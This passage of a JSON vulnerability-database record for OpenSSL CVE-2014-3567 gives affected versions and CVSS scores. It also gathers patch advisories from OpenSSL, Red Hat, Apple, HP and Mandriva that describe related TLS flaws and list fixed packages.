                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-3567"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "HP",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "131306"
      },
      {
        "db": "PACKETSTORM",
        "id": "130815"
      },
      {
        "db": "PACKETSTORM",
        "id": "131273"
      },
      {
        "db": "PACKETSTORM",
        "id": "131014"
      },
      {
        "db": "PACKETSTORM",
        "id": "132085"
      },
      {
        "db": "PACKETSTORM",
        "id": "128921"
      },
      {
        "db": "PACKETSTORM",
        "id": "132081"
      },
      {
        "db": "PACKETSTORM",
        "id": "132080"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2014-3567",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2014-3567",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-3567",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201410-636",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2014-3567",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-3567"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-636"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3567"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure. OpenSSL is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to crash the affected application, denying service to legitimate users. \nOpenSSL prior to 0.9.8zc, 1.0.0o, and 1.0.1j are vulnerable. This could be\nexploited in a Denial Of Service attack. This issue affects OpenSSL\n1.0.1 server implementations for both SSL/TLS and DTLS regardless of\nwhether SRTP is used or configured. Implementations of OpenSSL that\nhave been compiled with OPENSSL_NO_SRTP defined are not affected. \n\nThis issue was reported to OpenSSL on 26th September 2014, based on an original\nissue and patch developed by the LibreSSL project. Further analysis of the issue\nwas performed by the OpenSSL team. \n\nThe fix was developed by the OpenSSL team. \n\nThis issue was reported to OpenSSL on 8th October 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nSSL 3.0 Fallback protection\n===========================\n\nSeverity: Medium\n\nOpenSSL has added support for TLS_FALLBACK_SCSV to allow applications\nto block the ability for a MITM attacker to force a protocol\ndowngrade. \n\nSome client applications (such as browsers) will reconnect using a\ndowngraded protocol to work around interoperability bugs in older\nservers. This could be exploited by an active man-in-the-middle to\ndowngrade connections to SSL 3.0 even if both sides of the connection\nsupport higher protocols. SSL 3.0 contains a number of weaknesses\nincluding POODLE (CVE-2014-3566). \n\nhttps://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\nhttps://www.openssl.org/~bodo/ssl-poodle.pdf\n\nSupport for TLS_FALLBACK_SCSV was developed by Adam Langley and Bodo Moeller. \n\n\nBuild option no-ssl3 is incomplete (CVE-2014-3568)\n==================================================\n\nSeverity: Low\n\nWhen OpenSSL is configured with \"no-ssl3\" as a build option, servers\ncould accept and complete a SSL 3.0 handshake, and clients could be\nconfigured to send them. \n\nThis issue was reported to OpenSSL by Akamai Technologies on 14th October 2014. \n\nThe fix was developed by Akamai and the OpenSSL team. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20141015.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/about/secpolicy.html\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: openssl security update\nAdvisory ID:       RHSA-2014:1692-01\nProduct:           Red Hat Storage\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2014-1692.html\nIssue date:        2014-10-22\nCVE Names:         CVE-2014-3513 CVE-2014-3567 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that contain a backported patch to mitigate the\nCVE-2014-3566 issue and fix two security issues are now available for Red\nHat Storage 2.1. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Storage Server 2.1 - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary. \n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails. \n\nThis can prevent a forceful downgrade of the communication to SSL 3.0. \nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode. \nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication. \n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to mitigate the CVE-2014-3566 issue and correct\nthe CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect,\nall services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Storage Server 2.1:\n\nSource:\nopenssl-1.0.1e-30.el6_6.2.src.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3513\nhttps://access.redhat.com/security/cve/CVE-2014-3567\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/1232123\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUR/NUXlSAg2UNWIIRAlZHAJwPwsoiJDn5RhI6U8eFkIzxyQopkQCePynp\nRpfQCptdJIpd6WXO7pw1vVo=\n=T20t\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. This flaw allows a man-in-the-middle (MITM)\n    attacker to decrypt a selected byte of a cipher text in as few as 256\n    tries if they are able to force a victim application to repeatedly send\n    the same data over newly created SSL 3.0 connections. \n\n    This update adds support for Fallback SCSV to mitigate this issue. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-09-16-2 Xcode 7.0\n\nXcode 7.0 is now available and addresses the following:\n\nDevTools\nAvailable for:  OS X Yosemite v10.10.4 or later\nImpact:  An attacker may be able to bypass access restrictions\nDescription:  An API issue existed in the apache configuration. This\nissue was addressed by updating header files to use the latest\nversion. \nCVE-ID\nCVE-2015-3185 : Branko Aibej of the Apache Software Foundation\n\nIDE Xcode Server\nAvailable for:  OS X Yosemite 10.10 or later\nImpact:  An attacker may be able to access restricted parts of the\nfilesystem\nDescription:  A comparison issue existed in the node.js send module\nprior to version 0.8.4. This issue was addressed by upgrading to\nversion 0.12.3. \nCVE-ID\nCVE-2014-6394 : Ilya Kantor\n\nIDE Xcode Server\nAvailable for:  OS X Yosemite v10.10.4 or later\nImpact:  Multiple vulnerabilties in OpenSSL\nDescription:  Multiple vulnerabilties existed in the node.js OpenSSL\nmodule prior to version 1.0.1j. \nCVE-ID\nCVE-2014-3513\nCVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\nIDE Xcode Server\nAvailable for:  OS X Yosemite v10.10.4 or later\nImpact:  An attacker with a privileged network position may be able\nto inspect traffic to Xcode Server\nDescription:  Connections to Xcode Server may have been made without\nencryption. This issue was addressed through improved network\nconnection logic. \nCVE-ID\nCVE-2015-5910 : an anonymous researcher\n\nIDE Xcode Server\nAvailable for:  OS X Yosemite v10.10.4 or later\nImpact:  Build notifications may be sent to unintended recipients\nDescription:  An access issue existed in the handling of repository\nemail lists. This issue was addressed through improved validation. \nCVE-ID\nCVE-2015-5909 : Daniel Tomlinson of Rocket Apps, David Gatwood of\nAnchorfree\n\nsubversion\nAvailable for:  OS X Yosemite v10.10.4 or later\nImpact:  Multiple vulnerabilities existed in svn versions prior to\n1.7.19\nDescription:  Multiple vulnerabilities existed in svn versions prior\nto 1.7.19. These issues were addressed by updating svn to version\n1.7.20. \nCVE-ID\nCVE-2015-0248\nCVE-2015-0251\n\n\nXcode 7.0 may be obtained from:\nhttps://developer.apple.com/xcode/downloads/\n\nTo check that the Xcode has been updated:\n\n* Select Xcode in the menu bar\n* Select About Xcode\n* The version after applying this update will be \"7.0\". \n\nRelease Date: 2014-10-28\nLast Updated: 2014-10-28\n\nPotential Security Impact: Remote Denial of Service (DoS), unauthorized\naccess, man-in-the-middle (MitM) attack\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP-UX running\nOpenSSL. \n\nThis is the SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"Poodle\", which could be exploited remotely to\nallow disclosure of information. \n\nReferences:\n\nCVE-2014-3566 Man-in-th-Middle (MitM) attack\nCVE-2014-3567 Remote Unauthorized Access\nCVE-2014-3568 Remote Denial of Service (DoS)\nSSRT101767\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, B.11.31 running OpenSSL versions before v0.9.8zc\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2014-3566    (AV:N/AC:M/Au:N/C:P/I:N/A:N)       4.3\nCVE-2014-3567    (AV:N/AC:M/Au:N/C:N/I:N/A:C)       7.1\nCVE-2014-3568    (AV:N/AC:M/Au:N/C:N/I:P/A:N)       4.3\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following updates to resolve these vulnerabilities. The\nupdates are available from the following ftp site. \n\nftp://ssl098zc:Secure12@ftp.usa.hp.com\n\nUser name: ssl098zc Password: (NOTE: Case sensitive) Secure12\n\nHP-UX Release\n HP-UX OpenSSL version\n\nB.11.11 (11i v1)\n A.00.09.08zc.001_HP-UX_B.11.11_32+64.depot\n\nB.11.23 (11i v2)\n A.00.09.08zc.002_HP-UX_B.11.23_IA-PA.depot\n\nB.11.31 (11i v3)\n A.00.09.08zc.003_HP-UX_B.11.31_IA-PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nInstall OpenSSL A.00.09.08zc or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: install revision A.00.09.08zc.001 or subsequent\n\nHP-UX B.11.23\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: install revision A.00.09.08zc.002 or subsequent\n\nHP-UX B.11.31\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: install revision A.00.09.08zc.003 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 28 October 2014 Initial release\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory                         MDVSA-2015:062\n http://www.mandriva.com/en/support/security/\n _______________________________________________________________________\n\n Package : openssl\n Date    : March 27, 2015\n Affected: Business Server 2.0\n _______________________________________________________________________\n\n Problem Description:\n\n Multiple vulnerabilities has been discovered and corrected in openssl:\n \n Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL\n through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows\n remote attackers to inject data across sessions or cause a denial of\n service (use-after-free and parsing error) via an SSL connection in\n a multithreaded environment (CVE-2010-5298). \n \n The Montgomery ladder implementation in OpenSSL through 1.0.0l does\n not ensure that certain swap operations have a constant-time behavior,\n which makes it easier for local users to obtain ECDSA nonces via a\n FLUSH+RELOAD cache side-channel attack (CVE-2014-0076). \n \n The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before\n 1.0.1g do not properly handle Heartbeat Extension packets, which allows\n remote attackers to obtain sensitive information from process memory\n via crafted packets that trigger a buffer over-read, as demonstrated\n by reading private keys, related to d1_both.c and t1_lib.c, aka the\n Heartbleed bug (CVE-2014-0160). \n \n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before\n 1.0.1h does not properly restrict processing of ChangeCipherSpec\n messages, which allows man-in-the-middle attackers to trigger use of a\n zero-length master key in certain OpenSSL-to-OpenSSL communications,\n and consequently hijack sessions or obtain sensitive information,\n via a crafted TLS handshake, aka the CCS Injection vulnerability\n (CVE-2014-0224). \n \n The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other\n products, uses nondeterministic CBC padding, which makes it easier\n for man-in-the-middle attackers to obtain cleartext data via a\n padding-oracle attack, aka the POODLE issue (CVE-2014-3566). NOTE: this issue\n became relevant after the CVE-2014-3568 fix (CVE-2014-3569). \n \n The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before\n 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square\n of a BIGNUM value, which might make it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors,\n related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and\n crypto/bn/bn_asm.c (CVE-2014-3570). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote\n SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger\n a loss of forward secrecy by omitting the ServerKeyExchange message\n (CVE-2014-3572). \n \n OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k\n does not enforce certain constraints on certificate data, which allows\n remote attackers to defeat a fingerprint-based certificate-blacklist\n protection mechanism by including crafted data within a\n certificate\u0026#039;s unsigned portion, related to crypto/asn1/a_verify.c,\n crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c\n (CVE-2014-8275). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL\n servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate\n brute-force decryption by offering a weak ephemeral RSA key in a\n noncompliant role, related to the FREAK issue. NOTE: the scope of\n this CVE is only client code based on OpenSSL, not EXPORT_RSA issues\n associated with servers or other TLS implementations (CVE-2015-0204). \n \n The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before\n 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a\n Diffie-Hellman (DH) certificate without requiring a CertificateVerify\n message, which allows remote attackers to obtain access without\n knowledge of a private key via crafted TLS Handshake Protocol traffic\n to a server that recognizes a Certification Authority with DH support\n (CVE-2015-0205). \n \n The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before\n 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not\n properly handle a lack of outer ContentInfo, which allows attackers to\n cause a denial of service (NULL pointer dereference and application\n crash) by leveraging an application that processes arbitrary PKCS#7\n data and providing malformed data with ASN.1 encoding, related to\n crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289). \n \n The updated packages have been upgraded to the 1.0.1m version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293\n http://openssl.org/news/secadv_20150108.txt\n http://openssl.org/news/secadv_20150319.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 2/X86_64:\n 324a85f7e1165ab02881e44dbddaf599  mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n 9c0bfb6ebd43cb6d81872abf71b4f85f  mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm\n 58df54e72ca7270210c7d8dd23df402b  mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n b5313ffb5baaa65aea05eb05486d309a  mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm\n a9890ce4c33630cb9e00f3b2910dd784  mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm \n 521297a5fe26e2de0c1222d8d03382d1  mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS\nkz0ex6eI6hA6qSwklA2NoXY=\n=GYjX\n-----END PGP SIGNATURE-----\n. \nPlease refer to the RESOLUTION\n section below for a list of impacted products. \n\nNote: mitigation instructions are included below if the following software\nupdates cannot be applied. \n\nFamily\n Fixed Version\n HP Branded Products Impacted\n H3C Branded Products Impacted\n 3Com Branded Products Impacted\n CVE\n\n12900 Switch Series\n R1005P15\n JG619A HP FF 12910 Switch AC Chassis\nJG621A HP FF 12910 Main Processing Unit\nJG632A HP FF 12916 Switch AC Chassis\nJG634A HP FF 12916 Main Processing Unit\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n12500\n R1828P06\n JC085A HP A12518 Switch Chassis\nJC086A HP A12508 Switch Chassis\nJC652A HP 12508 DC Switch Chassis\nJC653A HP 12518 DC Switch Chassis\nJC654A HP 12504 AC Switch Chassis\nJC655A HP 12504 DC Switch Chassis\nJF430A HP A12518 Switch Chassis\nJF430B HP 12518 Switch Chassis\nJF430C HP 12518 AC Switch Chassis\nJF431A HP A12508 Switch Chassis\nJF431B HP 12508 Switch Chassis\nJF431C HP 12508 AC Switch Chassis\nJC072B HP 12500 Main Processing Unit\nJC808A HP 12500 TAA Main Processing Unit\n H3C S12508 Routing Switch(AC-1) (0235A0GE)\nH3C S12518 Routing Switch(AC-1) (0235A0GF)\nH3C S12508 Chassis (0235A0E6)\nH3C S12508 Chassis (0235A38N)\nH3C S12518 Chassis (0235A0E7)\nH3C S12518 Chassis (0235A38M)\nH3C 12508 DC Switch Chassis (0235A38L)\nH3C 12518 DC Switch Chassis (0235A38K)\n\n CVE-2014-3566\nCVE-2014-3568\n\n12500 (Comware v7)\n R7328P04\n JC085A HP A12518 Switch Chassis\nJC086A HP A12508 Switch Chassis\nJC652A HP 12508 DC Switch Chassis\nJC653A HP 12518 DC Switch Chassis\nJC654A HP 12504 AC Switch Chassis\nJC655A HP 12504 DC Switch Chassis\nJF430A HP A12518 Switch Chassis\nJF430B HP 12518 Switch Chassis\nJF430C HP 12518 AC Switch Chassis\nJF431A HP A12508 Switch Chassis\nJF431B HP 12508 Switch Chassis\nJF431C HP 12508 AC Switch Chassis\nJC072B HP 12500 Main Processing Unit\nJG497A HP 12500 MPU w/Comware V7 OS\nJG782A HP FF 12508E AC Switch Chassis\nJG783A HP FF 12508E DC Switch Chassis\nJG784A HP FF 12518E AC Switch Chassis\nJG785A HP FF 12518E DC Switch Chassis\nJG802A HP FF 12500E MPU\n H3C S12508 Routing Switch(AC-1) (0235A0GE)\nH3C S12518 Routing Switch(AC-1) (0235A0GF)\nH3C S12508 Chassis (0235A0E6)\nH3C S12508 Chassis (0235A38N)\nH3C S12518 Chassis (0235A0E7)\nH3C S12518 Chassis (0235A38M)\nH3C 12508 DC Switch Chassis (0235A38L)\nH3C 12518 DC Switch Chassis (0235A38K)\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n11900 Switch Series\n R2111P06\n JG608A HP FF 11908-V Switch Chassis\nJG609A HP FF 11900 Main Processing Unit\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n10500 Switch Series (Comware v5)\n R1208P10\n JC611A HP 10508-V Switch Chassis\nJC612A HP 10508 Switch Chassis\nJC613A HP 10504 Switch Chassis\nJC614A HP 10500 Main Processing Unit\nJC748A HP 10512 Switch 